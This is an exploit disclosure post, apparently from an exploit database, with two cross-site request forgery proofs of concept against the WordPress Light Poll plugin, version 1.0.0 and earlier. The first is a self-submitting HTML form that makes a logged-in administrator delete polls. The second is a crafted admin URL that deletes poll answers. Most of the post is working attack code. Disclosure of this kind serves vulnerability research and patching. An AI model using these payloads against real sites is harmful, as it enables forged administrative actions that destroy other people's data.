WordPress Light Poll 1.0.0 Cross Site Request Forgery

`# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF  
# Date: 05-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/light-poll/  
# Version: <=1.0.0  
# Tested on: Firefox  
# Contact me: [email protected]  
  
Description  
  
The plugin does not have CSRF checks when deleting polls, which could allow  
attackers to make logged in users perform such action via a CSRF attack  
  
Proof of Concept  
  
<html>  
<body>  
<form action="http://localhost/wp-admin/admin.php">  
<input type="hidden" name="page" value="lp_settings" />  
<input type="hidden" name="task" value="remove" />  
<input type="hidden" name="id" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
history.pushState('', '', '/');  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
Reference:  
https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/  
  
  
  
  
# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF  
# Date: 05-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/light-poll/  
# Version: <=1.0.0  
# Tested on: Firefox  
# Contact me: [email protected]  
  
Description  
  
The plugin does not have CSRF checks in some places, which could allow  
attackers to make logged in users perform unwanted actions via CSRF attacks  
  
Proof of Concept  
  
Where <<POLL_ID>> and <<ANSWER_ID>> are valid:  
  
https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=  
<<POLL_ID>>&answer_id=<<ANSWER_ID>>  
  
Reference:  
https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/  
`